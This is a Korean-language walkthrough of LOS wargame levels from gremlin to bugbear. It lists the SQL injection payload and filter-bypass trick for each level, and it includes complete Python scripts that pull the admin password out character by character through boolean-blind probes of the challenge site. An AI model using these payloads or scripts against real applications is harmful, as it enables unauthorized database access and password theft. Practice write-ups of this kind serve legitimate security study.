gremlin
select id from prob_gremlin where id='' or 1=1%23' and pw=''
#은 URL에서 fragment 구분자이므로 브라우저가 서버로 보내지 않음(삭제된 것처럼 보임). 주석 기호가 쿼리까지 전달되도록 %23으로 URL 인코딩해서 넣음
cobolt
select id from prob_cobolt where id='admin'%23' and pw=md5('')
admin id가 select되도록 함
#은 URL에서 fragment 구분자이므로 브라우저가 서버로 보내지 않음. 주석 기호가 쿼리까지 전달되도록 %23으로 URL 인코딩해서 넣음
goblin
select id from prob_goblin where id='guest' and no=0 or id=char(97,100,109,105,110)
AND가 OR보다 먼저 평가되므로 앞의 id='guest' and no=0 은 False가 되고(guest 행 제외), 뒤의 or id=char(...) 가 True가 되어 admin 행만 선택됨
싱글쿼터가 필터링되므로 'admin' 문자열을 char(97,100,109,105,110)처럼 아스키코드로 표현함
orc (blind Injection)
단순히 쿼리의 결과를 참으로 만들어서 풀리는 문제가 아님. 전달한 값과 admin의 패스워드가 정확히 일치해야 풀리는 문제임.
select id from prob_orc where id='admin' and pw='' or id='admin' and length(pw)='8'
우선 pw길이를 알아냈음
select id from prob_orc where id='admin' and pw='' or id='admin' and ascii(substr(pw,1,1))='50'
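import requests

# LOS "orc" challenge endpoint. The PHPSESSID below is a placeholder: paste your
# own session cookie locally and never commit the real value.
url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
cookies = {"PHPSESSID": "~~~~~"}

# Marker the page prints when the injected condition is true for the admin row.
SUCCESS_MARKER = "Hello admin"
# Per-request timeout (seconds) so one stalled connection cannot hang the brute force.
TIMEOUT = 10


def _oracle(payload):
    """Send one boolean-blind probe and report whether it evaluated true.

    Args:
        payload: Value of the ``pw`` GET parameter. ``requests`` percent-encodes
            quotes and spaces itself, so the payload is written as plain text.
    Returns:
        True when the response body contains ``SUCCESS_MARKER``.
    Raises:
        requests.RequestException: on network failure or timeout.
    """
    response = requests.get(url, params={"pw": payload}, cookies=cookies, timeout=TIMEOUT)
    return SUCCESS_MARKER in response.text


def pw_length(max_len=10):
    """Find the admin password length by testing length(pw) for 1..max_len.

    Args:
        max_len: Largest length to try (inclusive). Defaults to 10, the bound
            the original script used.
    Returns:
        The matching length.
    Raises:
        RuntimeError: if no length matched. The original returned None here,
            which made pw_string() crash on ``None + 1`` with no explanation.
    """
    for length in range(1, max_len + 1):
        # The closing quote of the literal is supplied by the query's trailing "'".
        if _oracle("' or id='admin' and length(pw)='%d" % length):
            print("password length is ", length)
            return length
    raise RuntimeError("no password length in 1..%d matched; increase max_len" % max_len)


def pw_string(length, lo=33, hi=126):
    """Recover the password one character at a time via ascii(substr(pw,i,1)).

    Args:
        length: Password length, normally from pw_length().
        lo, hi: Inclusive range of ASCII codes to try. Defaults cover every
            printable character 0x21..0x7E; the original used range(33, 126),
            which stops at 125 and would never match '~'.
    Returns:
        The recovered password (also printed).
    Raises:
        RuntimeError: if some position matched no candidate, instead of
            silently returning a shorter, wrong password.
    """
    password = ""
    for idx in range(1, length + 1):
        for code in range(lo, hi + 1):
            if _oracle("' or id='admin' and ascii(substr(pw,%d,1))='%d" % (idx, code)):
                password += chr(code)
                break
        else:
            raise RuntimeError("no character matched at position %d" % idx)
    print("password is ", password)
    return password


if __name__ == "__main__":
    print('-------------Getting Password Length-------------')
    length = pw_length()
    print('-------------Getting Password String-------------')
    pw_string(length)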
방법 1. select id from prob_wolfman where id='guest' and pw=''%0aor%0aid='admin'
공백이 필터링되므로 공백 대신 MySQL이 공백으로 취급하는 Line Feed(\n)를 %0a로 URL 인코딩해서 넣음
방법2. select id from prob_wolfman where id='guest' and pw=''/**/or/**/id='admin'
orge (blind injection): 아래 스크립트는 or/and 대신 ||/&&를 사용하여 pw 길이를 구한 뒤 패스워드를 첫 번째 문자부터 한 글자씩 알아냄
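import requests

# LOS "orge" challenge endpoint. The PHPSESSID below is a placeholder: paste your
# own session cookie locally and never commit the real value.
url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
cookies = {"PHPSESSID": "~~~~~"}

# Marker the page prints when the injected condition is true for the admin row.
SUCCESS_MARKER = "Hello admin"
# Per-request timeout (seconds) so one stalled connection cannot hang the brute force.
TIMEOUT = 10


def _oracle(payload):
    """Send one boolean-blind probe and report whether it evaluated true.

    Args:
        payload: Value of the ``pw`` GET parameter. ``requests`` percent-encodes
            ``&``, ``#`` and quotes itself, so the payload is written as plain
            text (unlike in a browser address bar, where ``#`` would be dropped
            as a fragment).
    Returns:
        True when the response body contains ``SUCCESS_MARKER``.
    Raises:
        requests.RequestException: on network failure or timeout.
    """
    response = requests.get(url, params={"pw": payload}, cookies=cookies, timeout=TIMEOUT)
    return SUCCESS_MARKER in response.text


def pw_length(max_len=10):
    """Find the admin password length by testing length(pw) for 1..max_len.

    Uses ``||``/``&&`` instead of ``or``/``and`` and a trailing ``#`` to
    comment out the rest of the original query.

    Args:
        max_len: Largest length to try (inclusive). Defaults to 10, the bound
            the original script used.
    Returns:
        The matching length.
    Raises:
        RuntimeError: if no length matched. The original returned None here,
            which made pw_string() crash on ``None + 1`` with no explanation.
    """
    for length in range(1, max_len + 1):
        if _oracle("' || id='admin' && length(pw)=%d#" % length):
            print("password length is ", length)
            return length
    raise RuntimeError("no password length in 1..%d matched; increase max_len" % max_len)


def pw_string(length, lo=33, hi=126):
    """Recover the password one character at a time via ascii(substr(pw,i,1)).

    Args:
        length: Password length, normally from pw_length().
        lo, hi: Inclusive range of ASCII codes to try. Defaults cover every
            printable character 0x21..0x7E; the original used range(33, 126),
            which stops at 125 and would never match '~'.
    Returns:
        The recovered password (also printed).
    Raises:
        RuntimeError: if some position matched no candidate, instead of
            silently returning a shorter, wrong password.
    """
    password = ""
    for idx in range(1, length + 1):
        for code in range(lo, hi + 1):
            # Compare as a bare number so the trailing '#' is a real comment.
            # The original wrote ="'%d#", which put the '#' inside a string
            # literal closed by the query's own trailing quote; it only worked
            # because MySQL coerces '50#' to 50 when comparing with a number.
            if _oracle("' || id='admin' && ascii(substr(pw,%d,1))=%d#" % (idx, code)):
                password += chr(code)
                break
        else:
            raise RuntimeError("no character matched at position %d" % idx)
    print("password is ", password)
    return password


if __name__ == "__main__":
    print('-------------Getting Password Length-------------')
    length = pw_length()
    print('-------------Getting Password String-------------')
    pw_string(length)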
위와 같은 파이썬 코드로 작성하였음
(브라우저와 달리 requests의 params=는 &, #, ' 등을 자동으로 퍼센트 인코딩해 주므로, 스크립트에서는 &와 #를 직접 URL 인코딩하지 않고 작성함)
troll
select id from prob_troll where id='Admin'
ereg함수로 'admin'이라는 문자열을 필터링하고 있었음
ereg 함수는 대소문자를 구별하므로 필터를 피해 Admin으로 넣었음. MySQL의 일반적인 *_ci collation에서는 문자열 비교가 대소문자를 구별하지 않아 id='Admin'이 admin 행과 일치함 — 필터의 비교 규칙과 DB의 비교 규칙이 다른 것이 우회가 가능한 원인
(참고로 eregi는 대소문자를 구별하지 않음. ereg/eregi는 PHP 7에서 제거된 함수임)
vampire
select id from prob_vampire where id='aadmindmin'
"admin"을 ""으로 한 번만 치환하고 있어서, 치환 후에 다시 admin이 남도록 aadmindmin을 넣어 해결함(치환을 반복하지 않는 필터는 이런 방식으로 우회됨)
skeleton
select id from prob_skeleton where id='guest' and pw='' or id='admin'%23' and 1=0
앞의 and문을 false로 만든 후 or문을 True로 만들고 뒤에는 주석(%23)처리 함
golem (blind injection)
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 length(pw) like 8%23'
=을 필터링하고 있어서 대신 like를 사용함. &는 쿼리스트링 구분자, #는 fragment 구분자라서 그대로 넣으면 서버까지 전달되지 않으므로 각각 %26, %23으로 URL 인코딩(필터 우회가 아니라 전달을 위한 인코딩)하여 패스워드의 길이를 알아냄
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 ascii(mid(pw,1,1)) like 56%23'
substr을 필터링하고 있어서 같은 기능을 하는 mid를 사용하여 패스워드의 문자를 알아냄
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 ascii(right(left(pw,1),1)) like 56%23'
mid 함수뿐만 아니라 right와 left함수로도 우회가 가능함
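import requests

# LOS "golem" challenge endpoint. The PHPSESSID below is a placeholder: paste your
# own session cookie locally and never commit the real value.
url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
cookies = {"PHPSESSID": "~~~~~"}

# Marker the page prints when the injected condition is true for the admin row.
SUCCESS_MARKER = "Hello admin"
# Per-request timeout (seconds) so one stalled connection cannot hang the brute force.
TIMEOUT = 10


def _oracle(payload):
    """Send one boolean-blind probe and report whether it evaluated true.

    Args:
        payload: Value of the ``pw`` GET parameter. ``requests`` percent-encodes
            ``&``, ``#`` and quotes itself, so the payload is written as plain
            text (in a browser these had to be typed as %26 / %23).
    Returns:
        True when the response body contains ``SUCCESS_MARKER``.
    Raises:
        requests.RequestException: on network failure or timeout.
    """
    response = requests.get(url, params={"pw": payload}, cookies=cookies, timeout=TIMEOUT)
    return SUCCESS_MARKER in response.text


def pw_length(max_len=10):
    """Find the admin password length by testing length(pw) for 1..max_len.

    ``like`` stands in for the filtered ``=``; with no wildcard it behaves as
    equality here. A trailing ``#`` comments out the rest of the query.

    Args:
        max_len: Largest length to try (inclusive). Defaults to 10, the bound
            the original script used.
    Returns:
        The matching length.
    Raises:
        RuntimeError: if no length matched. The original returned None here,
            which made pw_string() crash on ``None + 1`` with no explanation.
    """
    for length in range(1, max_len + 1):
        if _oracle("' || id like 'admin' && length(pw) like %d#" % length):
            print("password length is ", length)
            return length
    raise RuntimeError("no password length in 1..%d matched; increase max_len" % max_len)


def pw_string(length, lo=33, hi=126):
    """Recover the password one character at a time via ascii(mid(pw,i,1)).

    ``mid()`` replaces the filtered ``substr()``.

    Args:
        length: Password length, normally from pw_length().
        lo, hi: Inclusive range of ASCII codes to try. Defaults cover every
            printable character 0x21..0x7E; the original used range(33, 126),
            which stops at 125 and would never match '~'.
    Returns:
        The recovered password (also printed).
    Raises:
        RuntimeError: if some position matched no candidate, instead of
            silently returning a shorter, wrong password.
    """
    password = ""
    for idx in range(1, length + 1):
        for code in range(lo, hi + 1):
            if _oracle("' || id like 'admin' && ascii(mid(pw,%d,1)) like %d#" % (idx, code)):
                password += chr(code)
                break
        else:
            raise RuntimeError("no character matched at position %d" % idx)
    print("password is ", password)
    return password


if __name__ == "__main__":
    print('-------------Getting Password Length-------------')
    length = pw_length()
    print('-------------Getting Password String-------------')
    pw_string(length)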
위와 같은 파이썬 코드로 작성하였음
darkknight (blind injection)
방법 1. select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110)
select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110) and length(pw) like 8
select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110) and ord(mid(pw,1,1)) like 49
ascii 함수가 필터링되어 아스키코드 10진수로 변환해주는 ord함수를 사용함
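import requests

# LOS "darkknight" challenge endpoint. The PHPSESSID below is a placeholder: paste
# your own session cookie locally and never commit the real value.
url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
cookies = {"PHPSESSID": "~~~~~"}

# Marker the page prints when the injected condition is true for the admin row.
SUCCESS_MARKER = "Hello admin"
# Per-request timeout (seconds) so one stalled connection cannot hang the brute force.
TIMEOUT = 10

# 'admin' spelled with char() so the payload needs no quote characters.
ADMIN_NO_QUOTES = "char(97,100,109,105,110)"


def _oracle(payload):
    """Send one boolean-blind probe through the numeric ``no`` parameter.

    Args:
        payload: Value of the ``no`` GET parameter. It is injected unquoted, so
            ``-999 or ...`` falsifies the guest branch and the ``or`` branch
            decides the result. ``requests`` percent-encodes spaces itself.
    Returns:
        True when the response body contains ``SUCCESS_MARKER``.
    Raises:
        requests.RequestException: on network failure or timeout.
    """
    response = requests.get(url, params={"no": payload}, cookies=cookies, timeout=TIMEOUT)
    return SUCCESS_MARKER in response.text


def pw_length(max_len=10):
    """Find the admin password length by testing length(pw) for 1..max_len.

    ``like`` is used in place of ``=``; with no wildcard it acts as equality.

    Args:
        max_len: Largest length to try (inclusive). Defaults to 10, the bound
            the original script used.
    Returns:
        The matching length.
    Raises:
        RuntimeError: if no length matched. The original returned None here,
            which made pw_string() crash on ``None + 1`` with no explanation.
    """
    for length in range(1, max_len + 1):
        if _oracle("-999 or id like %s and length(pw) like %d" % (ADMIN_NO_QUOTES, length)):
            print("password length is ", length)
            return length
    raise RuntimeError("no password length in 1..%d matched; increase max_len" % max_len)


def pw_string(length, lo=33, hi=126):
    """Recover the password one character at a time via ord(mid(pw,i,1)).

    ``ord()`` replaces the filtered ``ascii()``; for single-byte characters
    the two return the same value.

    Args:
        length: Password length, normally from pw_length().
        lo, hi: Inclusive range of ASCII codes to try. Defaults cover every
            printable character 0x21..0x7E; the original used range(33, 126),
            which stops at 125 and would never match '~'.
    Returns:
        The recovered password (also printed).
    Raises:
        RuntimeError: if some position matched no candidate, instead of
            silently returning a shorter, wrong password.
    """
    password = ""
    for idx in range(1, length + 1):
        for code in range(lo, hi + 1):
            if _oracle("-999 or id like %s and ord(mid(pw,%d,1)) like %d" % (ADMIN_NO_QUOTES, idx, code)):
                password += chr(code)
                break
        else:
            raise RuntimeError("no character matched at position %d" % idx)
    print("password is ", password)
    return password


if __name__ == "__main__":
    print('-------------Getting Password Length-------------')
    length = pw_length()
    print('-------------Getting Password String-------------')
    pw_string(length)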
위와 같은 파이썬 코드로 작성함
bugbear (blind injection)
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")%0a%26%26length(pw)in(8)
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")%26%26hex(mid(pw,1,1))in(hex(55))